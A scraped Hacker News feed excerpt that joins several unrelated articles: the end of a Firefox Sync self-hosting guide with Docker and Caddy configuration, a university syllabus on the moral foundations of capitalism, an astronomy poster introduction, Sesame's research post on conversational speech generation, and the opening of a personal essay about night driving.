          MYSQL_ROOT_PASSWORD: rootpass
    
      firefox_syncserver:
        container_name: firefox_syncserver
        build:
          context: /root/ffsync
          dockerfile: Dockerfile
          args:
            BUILDKIT_INLINE_CACHE: 1
        restart: unless-stopped
        ports:
          - "8000:8000"
        depends_on:
          - firefox_mariadb
        environment:
          LOGLEVEL: info
          SYNC_URL: https://mydomain/sync
          SYNC_CAPACITY: 5
          SYNC_MASTER_SECRET: mastersecret
          METRICS_HASH_SECRET: metricssecret
      SYNC_SYNCSTORAGE_DATABASE_URL: mysql://sync:syncpass@firefox_mariadb:3306/syncstorage_rs
      SYNC_TOKENSERVER_DATABASE_URL: mysql://sync:syncpass@firefox_mariadb:3306/tokenserver_rs
    

    A few tips:

    • Be cautious with the database passwords. Avoid using special characters like "/|%" as they can cause issues during setup.
    • I added the BUILDKIT_INLINE_CACHE argument to the Docker Compose file to make better use of caching, which reduced build time while testing.

    Initializing the Database

    I cloned the repository and copied the Dockerfile and initdb.sh script to my server. After making some tweaks, I ran the following steps to get the database up and running:

    1. Bring up the MariaDB container:
      docker-compose up -d firefox_mariadb
      
    2. Make the initialization script executable and run it:
      chmod +x initdb.sh
      ./initdb.sh
      

    Bringing the Stack Online

    Finally, I brought up the entire stack with:

    docker-compose up -d

    Configuring Reverse Proxy with Caddy

    Next, I needed to update my Caddy reverse proxy to point to the new Sync server. I added the following configuration:

    mydomain:443 {
        reverse_proxy firefox_syncserver:8000
    }
    

    After updating Caddy with the DNS entry, I restarted the proxy and the sync server was up and running.

    Challenges Faced

    While I eventually got everything working, there were a few notable challenges along the way:

    1. Database persistence: I had issues with persistent data when restarting the MariaDB container. Make sure to clear out old data if needed.
    2. Server storage: My server ran out of space during the build process due to the size of the Docker images and intermediate files (see the cleanup command after this list).
    3. Following the right steps: It took me a while to figure out the right steps, and much of the time was spent experimenting with the Docker setup.
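
    If you run into the same storage problem, Docker's built-in cleanup command reclaims dangling images and build cache. (This is an aside of mine, not part of the original setup, and it is destructive, so review what it lists before confirming.)

    docker system prune -a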

    Final Thoughts

    Setting up a self-hosted Firefox Sync server is not the easiest task, especially if you’re not very familiar with Docker or database management. The official documentation is confusing, but thanks to community efforts like the syncstorage-rs-docker repo, it’s doable.

    In the end, it took me about two hours to get everything running, but it was worth it. If you’re looking to control your own Firefox Sync server, this guide should help you avoid some of the pitfalls I encountered.

    Happy syncing!

    ]]>
    https://blog.diego.dev/posts/firefox-sync-server/ hacker-news-small-sites-43214294 Sat, 01 Mar 2025 01:03:48 GMT
    <![CDATA[Moral Foundations of Capitalism]]> thread link) | @yamrzou
    February 28, 2025 | http://rdc1.net/class/Moral%20Foundations/Moral_Foundations_Iindex.html | archive.org

    Econ 411
    Moral Foundations of Capitalism

    Spring 2025

    WVU Class and Time
    Brooks Hall D 225 T-Th  4:00-5:15
    Instructor: Professor Roger D. Congleton  
    Office: 5201 Reynolds Hall
    Office Phone: 3-7866 (during office hours)

    E-Mail:
     roger.congleton@mail.wvu.edu
    (e-mail is the most reliable way to reach me).
    Office Hours: 2:30-3:30 Tuesday and Thursdays, and most other afternoon times by appointment
    Required Texts: Congleton, R. D., Solving Social Dilemmas: Ethics, Politics, and Prosperity. Oxford University Press.  (Plus class webnotes, links provided below)
    Optional Texts
    Source Material for the Course*

    Aristotle (350 BC) Nicomachean Ethics. (Available as an e-book from Google, Liberty Fund, Amazon, etc.)
    Buchanan, J. M. (1997) Ethics and Economic Progress. Norman, OK: University of Oklahoma Press.
    Mill, J. S. (1863) On Liberty. Boston: Ticknor and Fields. (Available as an e-book from Google and Liberty Fund.)
    Rand, A. (2005) Atlas Shrugged. New York: Penguin. (Available as an e-book from Google and Amazon.)
    Smith, A. (1776) An Inquiry Into the Nature and Causes of the Wealth of Nations. (Available as an e-book from Google and Liberty Fund.)
    Spencer, H. (1896) Principles of Ethics. New York: Appleton and Company. (Available as an e-book at Liberty Fund and at the Von Mises Institute.)
    Weber, Max (1930) The Protestant Ethic and the Spirit of Capitalism. (Available as an e-book from Google and Amazon.)

    Course Description: Tentative Syllabus (as a PDF)
    Moral Foundations of Capitalism is a lecture-based course that explores how some types of ethical dispositions--internalized rules--allow markets to become larger and more effective sources of food, material comfort, and entertainment. They do so by reducing unproductive conflict, avoiding overuse of common resources, simplifying contract enforcement, internalizing externalities, reducing team production problems, encouraging capital accumulation and innovation, and avoiding counterproductive public policies. The great acceleration of commerce that "took off" during the nineteenth century, and that produced the effective markets we largely take for granted today, was associated with a shift in norms that generally supported market activities.

    Whether then we suppose that the End impresses each man's mind with certain notions not merely by nature, but that there is somewhat also dependent on himself; or that the End is given by nature, and yet Virtue is voluntary because the good man does all the rest voluntarily, Vice must be equally so;

    Aristotle (2012-05-17). Ethics (p. 82). Kindle Edition.

    For not only is a developed sense of responsibility absolutely indispensable, but in general also an attitude which, at least during working hours, is freed from continual calculations of how the customary wage may be earned with a maximum of comfort and a minimum of exertion. Labor must, on the contrary, be performed as if it were an absolute end in itself, a calling. But such an attitude is by no means a product of nature.

    Weber, Max (2012-10-21). The Protestant Ethic and the Spirit of Capitalism (Kindle Locations 311-314). Vook, Inc. Kindle Edition.

    The course is divided into three parts. (1) The first part reviews theories of ethics from Aristotle through A. Pigou. This intellectual history introduces students to several theories of ethics. The theories demonstrate that ethics is not simply a gut feeling, but may have rational foundations. The overview also provides evidence that ethical theories in the West gradually became more supportive of commerce in the period before the great acceleration in the West during the nineteenth century. (2) The second part of the course uses game theory and economic theory to show how a subset of ethical dispositions can increase the efficiency and extent of exchange and production. When such ethical dispositions become commonplace, trading networks become more extensive, specialization increases, larger economic organizations become feasible, and rates of innovation tend to increase. In this manner, a commercial society can emerge. (3) The third part of the course explores how normative theories affect governance and market-relevant public policies. It demonstrates that the ethical dispositions of voters and rule enforcers can make a government more likely to be "productive" than "extractive." Together the second and third parts show that without supportive norms, markets would be far smaller and less efficient, and average material welfare much lower.

    The main goals of the course are (1) to introduce students to the idea of social dilemmas and the manner in which some ethical dispositions solve or moderate them, (2) to increase their understanding of the many ways in which normative theories affect the extent of commerce, and (3) to make students more familiar with several of the core ethical arguments concerning the proper role of markets in a good life that emerged in the period from 1600 to 1920.

    Overall the course suggests that some societies are richer than others because their normative culture--their most commonplace ethical dispositions--accords a broader role for commerce in a good life and good society than others, and also encourages the behaviors that make markets and governments work more efficiently. In other words, it implies that commercial societies have moral foundations.

    Grades are determined by two examinations (60%), 6 quizzes (15%), and a final paper (25%).

    This exchange society and the guidance of the coordination of a far-ranging division of labor by variable market prices was made possible by the spreading of certain gradually evolved moral beliefs which, after they had spread, most men in the Western world learned to accept. These rules were inevitably learned by all the members of a population consisting chiefly of independent farmers, artisans and merchants and their servants and apprentices who shared the daily experiences of their masters…. They held an ethos that esteemed the prudent man, the good husbandman and provider who looked after the future of his family and his business by building up capital, guided less by the desire to be able to consume much than by the wish to be regarded as successful by his fellows who pursued similar aims.

    F. A. Hayek [1979/2011]. Law, Legislation and Liberty, Volume 3: The Political Order of a Free People [pp. 164–165]. University of Chicago Press; Kindle Edition.




    Tentative Course Outline

    Dates / Topic / Readings

    0. Introduction to Moral Foundations of Capitalism

    January 14 Norms as personal motivations and self restraint. Two approaches to norms: positive--the study of the effects of norms, and normative--the application of normative theories to assess private behavior, societies, and market outcomes. Norms that help and hurt economic growth. Capitalism as a name for contemporary market-based networks and lifestyles. (Homo Constitutionalus)
    SSD- Preface, Ch 1

    Why MBA's Read Plato (WSJ)
    Vonnegut: Harrison Bergeron



    I. Theories of the Role of Commerce in a Good Life

    January 16, 21
    1. Aristotle's Ethics with Applications to Political and Economic Theory. Ethics as the pursuit of lifetime happiness, rather than short-term pleasure. Aristotle's principle of moderation in all things. Wealth as a means to an end. Aristotelian virtues. Aristotle as the foundation of contemporary secular ethics.
    SSD - Ch. 9
    January 23, 28
    2. The Early Enlightenment and Market-Supporting Ethics. Three major disruptions of the medieval order. Natural law and the moral sense. Markets as a dissipating or supporting system for ethical development. Rising importance of life on earth. Baxter and Barclay on duties on earth. Locke and the division between theological and civil ethics. (E-Campus Homework 1 Due Jan 30) SSD - Ch 10

    Links to Homeworks
    on Ecampus

    January 30, February 4
    3. Classical Liberalism, Ethics, and the Market. Montesquieu and the importance of political virtue. Franklin and the "spirit" of capitalism. Smith: moral sentiments and the impartial spectator as the source of ethics and virtue. Kantian duties and the moral imperative. Bastiat on market support for ethics. 
    SSD - Ch 11
    February 6, 11
    4. Utilitarianism: Trade Increases Social Welfare. Another secular core principle for the development of ethics. Bentham and the utilitarian revolution, Mill's extensions. Spencer's evolutionary approach. Do ethics improve survival prospects? Emergence of social ethics along with democratic politics. Ideology as social ethics. (E-Campus Homework 2, Due February 13)

    II. Ethics and the Extent of Commercial Networks

    February 13, 18, 20
    5. Civil Ethics and Civil Society: A Game Theoretic Analysis
    (1) Introduction to Game Theory: Strategy Choice and Nash Equilibrium with Applications to Ethics and Civil Society, (2) Escaping the Hobbesian Dilemma, ethics and law as substitutes, (3) Solving coordination games, (4) Internalizing Externalities
    (E-Campus Homework 3, Due February 24)

    SSD - Ch 2
    (Prerecorded Lecture, if necessary)
    February 25
    Review for Midterm Exam
    Study Guide I
    February 27
    Midterm Exam

    March 4
    Exams Returned and Reviewed

     March 6*, 11, 13
    6. Market Dilemmas and Ethical Solutions: The Ethical Foundations of Commerce
    (1) Economics of gains to trade and trading networks, (2) Problems of Team Production, how the work ethic improves team production and promotes specialization. How selecting ethical persons can improve profits and encourage some types of ethical behavior. (3) Transaction and Enforcement costs as a limit on the extent of trading networks and specialization. How ethics reduces contract complexity and enforcement costs and expands markets. Evidence of the importance of Trustworthiness. (E-Campus Homework 4, Due March 25)
    SSD - Ch 3
    (*March 6, travel day,
    prerecorded lecture)
    March 18, 20
    No Class Spring Break

    March 25, 27, April 1*
    7. Neoclassical Economics with Ethics. Bringing ethics into the Marginal Benefit-Marginal Cost Framework, Marginal Revenue Product as a consequence of team production and private ethics. Equilibrium investments and distributions of Virtue. Ethics and Commerce are co-determined.
    SSD - Ch 4
      (* April 1, travel day,
    prerecorded lecture)
    April 3*, 8
    8. Ethics and Economic Progress. Ethical aspects of progress. Economic growth requires solving social dilemmas associated with specialization, capital accumulation, and innovation. Ethical support for economic development. (E-Campus Homework 5 Due April 10) SSD - Ch 5
    (*April 3, travel day,
    prerecorded lecture)

    III. Ethics, Politics, and Prosperity

    April 10
    9. Ethics and Governance. The simplest form of government: customary law enforcement.  Corruption and the moral mitigation of corruption. The role of ethics in simple productive governments. Customary and Common Law. Extractive versus productive governance. SSD - Ch 6
    April 15
    10. Ethics and Democratic Public Policy. Norms and Institutions for Good Governance. The median voter theorem(s). The democratic indecisiveness problem. The democratic poverty trap. The problem of holding the next election. Normative solutions to democratic dilemmas.
    SSD - Ch 7

    April 17
    11. Ethics and Political-Economy System Choice. Ethics and the relative performance of political and economic systems. On the logic of a bounded domain for governance under different mixes of ethical disposition in government and markets. (E-Campus Homework 6 Due April 21)
    SSD - Ch 8
    April 22
    Review for Second Midterm
    Study Guide II
    April 24
     Second Midterm Exam

    April 29
    Exams Returned and Reviewed / Paper Workshop
    Paper Topics
    May 1
    Last Day of Class, Overview of Course and Paper Workshop
    SSD - Ch 13



    May 7
    Papers Due by Midnight (to be e-mailed to roger.congleton@mail.wvu.edu)




    “Look around you,” he said. “A city is the frozen shape of human courage—the courage of those men who thought for the first time of every bolt, rivet and power generator that went to make it. The courage to say, not ‘It seems to me,’ but ‘It is’—and to stake one’s life on one’s judgment. You’re not alone. Those men exist. They have always existed.

    Rand, Ayn (2005-04-21). Atlas Shrugged (pp. 473-474). Penguin Group. Kindle Edition.

    Grades:
    Midterm and Endterm Exams: 60.00%
    6 Ecampus Quizzes: 15.00%
    Term Paper: 25.00%


    Marginal extra credit for extraordinary class participation (up to 5% bonus)


    Institutional Policies and Services: Students are responsible for reviewing policies on inclusivity, academic integrity, incompletes, sale of course materials, sexual misconduct, adverse weather, as well as student evaluation of instruction, and days of special concern/religious holiday statements.

    Link to WVU Policies and Syllabus Addenda


    ]]>
    http://rdc1.net/class/Moral%20Foundations/Moral_Foundations_Iindex.html hacker-news-small-sites-43214014 Sat, 01 Mar 2025 00:32:04 GMT
    <![CDATA[An introduction to Elementary Game Theory [pdf]]]> thread link) | @yamrzou
    February 28, 2025 | http://rdc1.net/class/Intermediate_Micro/EC301HO7b.pdf | archive.org

    Unable to extract article]]>
    http://rdc1.net/class/Intermediate_Micro/EC301HO7b.pdf hacker-news-small-sites-43213956 Sat, 01 Mar 2025 00:27:33 GMT
    <![CDATA[The Celestial Zoo (2001)]]> thread link) | @okl
    February 28, 2025 | https://pablocarlosbudassi.com/2021/02/the-celestial-zoo-celestial-zoo-tour-of.html | archive.org

    Welcome to THE CELESTIAL ZOO, a tour of 210 destinations in the vast expanse of our Universe.

    This guide is designed to provide a 2-minute stay at each different cosmic landscape, with a couple of fast mindblowing facts and essential knowledge that hopefully will stick with you forever. We carefully selected the most peculiar galaxies, stars, planets, and other fluttering creatures for our vividly detailed safari.


    The graphic showcases a circular master schematic of the observable universe projected on a radial logarithmic scale with the Sun at its center. Each object in the schema has been labeled with a number for easy indexing in the surrounding text columns.

    The numbers assigned to each object follow the order of their proximity to the center of the solar system, beginning with the Sun (1) and extending outward through the planets and other objects of the solar system (2-51), nearby stars (52-112), distant notable stars, star clusters, and nebulae (113-123), nearby galaxies (124-156), notable galaxies, galactic clusters, and superclusters (157-203), and finally, the most distant known objects (204-210).

    The color code used in the title labels of each astronomical object corresponds to five categories: moon/asteroid/other, planets, star systems, galaxies, and large-scale objects.


    The intention behind selecting the featured objects was to provide an overview of both well-known subjects familiar to the general public and lesser-known yet equally captivating ones.

    This infographic is the poster component of a multi-platform project also presented in pocket tourist guidebooks and short videos on social channels. Instagram, Facebook, YouTube, Twitter, and TikTok accounts will be active to disseminate the diverse and fast-changing universe of our current astronomical understanding.
    As of April 2024, the poster and book have just been released in Spanish and are currently being translated into French and German. Overall, it was an exciting project for us to work on. We hope you find as much joy in exploring these materials as we did in creating them.

    ]]>
    https://pablocarlosbudassi.com/2021/02/the-celestial-zoo-celestial-zoo-tour-of.html hacker-news-small-sites-43213743 Sat, 01 Mar 2025 00:07:53 GMT
    <![CDATA[Show HN: Tracking President Trump's Executive Orders]]> thread link) | @LightMorpheus
    February 28, 2025 | https://tonygaeta.com/labs/executive-orders | archive.org

    Tracking President Trump's Executive Orders

    ]]>
    https://tonygaeta.com/labs/executive-orders hacker-news-small-sites-43212613 Fri, 28 Feb 2025 22:35:17 GMT
    <![CDATA["Enough with All the Raft" by Alex Miller]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/2016d6c4-b08d-40b3-af2f-67926ca8521f-enough-with-all-the-raft | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/2016d6c4-b08d-40b3-af2f-67926ca8521f-enough-with-all-the-raft hacker-news-small-sites-43211997 Fri, 28 Feb 2025 21:57:22 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @Matetricks
    February 28, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2], as sketched below. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.
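
    To make the residual idea concrete, here is a minimal NumPy sketch of RVQ encoding (an illustration of the general technique, not the tokenizer used in this work): each codebook quantizes whatever residual the previous codebooks left behind.

      import numpy as np

      def rvq_encode(x, codebooks):
          # x: (D,) frame embedding; codebooks: list of (V, D) arrays, coarse to fine
          residual = x.astype(np.float64).copy()
          codes = []
          for cb in codebooks:
              idx = int(np.argmin(((residual - cb) ** 2).sum(axis=1)))  # nearest code
              codes.append(idx)
              residual -= cb[idx]  # the next codebook quantizes what is left over
          return codes  # one integer per codebook level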

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation: semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
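
    For illustration, the delay pattern amounts to shifting each codebook row to the right by its level index (a sketch under assumed array shapes):

      import numpy as np

      def apply_delay_pattern(codes, pad_id=0):
          # codes: (K, T) array of RVQ tokens, K codebooks by T frames.
          # Codebook k is shifted right by k steps, so each prediction can
          # condition on the lower codebooks of the same original frame.
          K, T = codes.shape
          out = np.full((K, T + K - 1), pad_id, dtype=codes.dtype)
          for k in range(K):
              out[k, k:k + T] = codes[k]
          return out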

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.
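
    In pseudocode, the loop in the figure looks roughly like this (hypothetical function names; a sketch of the described flow, not the actual implementation):

      def csm_generate(backbone, decoder, history, n_codebooks, audio_eot):
          # history: interleaved text/audio tokens of the conversation so far
          frames = []
          while True:
              c0 = backbone.predict_zeroth(history)  # codebook level 0
              if c0 == audio_eot:
                  break
              rest = decoder.sample(c0, n_levels=n_codebooks - 1)  # levels 1..N-1
              frame = [c0] + rest
              frames.append(frame)
              history.append(frame)  # feed the reconstructed token back in
          return frames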

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. Even with a small model, this memory burden slows down training, limits model scaling, and hinders the rapid experimentation that is crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.
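
    The frame-subsetting idea can be expressed in a few lines (a PyTorch-style sketch with assumed shapes, not the actual training code):

      import torch

      def decoder_loss_mask(B, S, frac=1.0 / 16, device="cpu"):
          # The backbone receives loss on every frame; the audio decoder only
          # on a random ~1/16 subset, shrinking its effective B*S frame batch.
          return torch.rand(B, S, device=device) < frac  # True = decoder trained here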

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    • Paralinguistics: sentences from Base TTS
    • Foreign words: sentences from Base TTS
    • Contextual expressivity: samples from Expresso, continuation after chime
    • Pronunciation correction: the correction sentence is a recording; all other audio is generated
    • Conversations with multiple speakers: single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounces different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.
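
    As a rough illustration, a check like this can be scripted with the phoneme recognizer mentioned above (a hedged sketch; the exact evaluation wiring here is an assumption, not the authors' pipeline):

      from transformers import pipeline

      # facebook/wav2vec2-lv-60-espeak-cv-ft transcribes speech into espeak phonemes
      asr = pipeline("automatic-speech-recognition",
                     model="facebook/wav2vec2-lv-60-espeak-cv-ft")

      def pronounced_as_expected(wav_path, expected_phonemes):
          # e.g. expected_phonemes "lɛd" for the metal, "liːd" for the verb
          transcript = asr(wav_path)["text"]
          return expected_phonemes in transcript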

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43211399 Fri, 28 Feb 2025 21:27:45 GMT
    <![CDATA[Death Drives in the Aleph: cloud storage, rental cars, & infinity]]> thread link) | @casmalia
    February 28, 2025 | https://www.onshoreleave.com/posts/death-drives/ | archive.org

    2025 · 02 · 26

    "In that single gigantic instant I saw millions of acts both delightful and awful; not one of them occupied the same point in space, without overlapping or transparency... Nonetheless, I'll try to recollect what I can."

    For the better part of ten years, terrified of both impermanence and the false eternities of cloud storage, I never backed up my photos.

    There were a dozen false starts on dropbox. Empty, meticulously named folders sketched out taxonomies that I thought could contain the world in perfect miniature. I would spend days on these systems and then abandon them as soon as some intrinsic fault or other became clear. Few of them would have been legible to anyone else. None could account for the basic fact that I spent most of my time driving rented cars: the least categorizable activity, filling only the loosest stretches between more defined spaces and periods of life.

    It didn’t help that most people I liked couldn’t or wouldn’t drive. Bombing out of the tracks they’d been on at 19, they had scattered to minor but achingly atmospheric cities. I would pick them up with some pretense - the idea of a quest, a great nostalgic return or a new event that seemed to promise a path forward - and then spend weeks driving them around, exchanging so many words that it was as if we were attempting a definitive fusion.

    As much as I enjoyed the conversation, I was happiest when they fell asleep in the passenger seat, and I had another six or seven hours to myself just to drive. I could indulge more fully in what I actually wanted: that delicate puppetry of branches playing across the windscreen or parting briefly to reveal a distant swell of moonlit hills. That sense of being outside of time. The space of the cab encloses you from all this with a series of layers: first the tunnel of the headlights like a formal foyer, then the fogged glass and the glow of the dashboard. There are few things more beautiful than those flickering dials mirrored and projected out over the road. At some point your certainty in the biological body begins to fade; the seat no longer seems to press back up against it. These changes are acknowledged with a dreamy indifference. Whatever envelope contains “you” extends through the vinyl and out to the wheels and body, where that low roar of wind and gravel become cognitive defaults rather than additions. This effect is sensitive. Maintaining it for hours requires a unique set of skills. Some foreign cars will still let you turn the headlights off on the highway to inhabit it more fully. Most music breaks it, but the right song seems to expand its boundaries, the music peeling off and applying itself like a thin layer to the landscape. I’ve never understood what people mean by most pop-psychological states - by “dissociation” or "flow" - but if they are achieving this effect outside of a car, I envy them.

